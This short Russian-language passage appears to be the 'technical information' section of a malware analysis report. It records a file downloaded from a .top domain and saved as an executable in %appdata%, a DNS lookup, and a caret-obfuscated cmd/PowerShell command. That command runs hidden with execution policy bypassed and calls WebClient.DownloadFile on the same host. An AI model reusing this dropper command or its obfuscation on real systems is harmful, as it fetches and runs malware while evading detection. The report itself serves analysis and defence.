Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^RS^hEL^l.^Ex^E -^exe^C^U^TIoNpOL^i^c^y^ ^BYp^As^S -^noprOF^Il^e^ ^-^w^INDO^ws^TYle hIDDEn (^new-o^b^jE^c^T sy^s^T^E^M.nE^t.We^B^cL^I^ENT^).D^O^WN^lOadF^ile('http://sutrap...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^RS^hEL^l.^Ex^E -^exe^C^U^TIoNpOL^i^c^y^ ^BYp^As^S -^noprOF^Il^e^ ^-^w^INDO^ws^TYle hIDDEn (^new-o^b^jE^c^T sy^s^T^E^M.nE^t.We^B^cL^I^ENT^).D^O^WN^lOadF^ile('http://sutrap...' (со скрытым окном)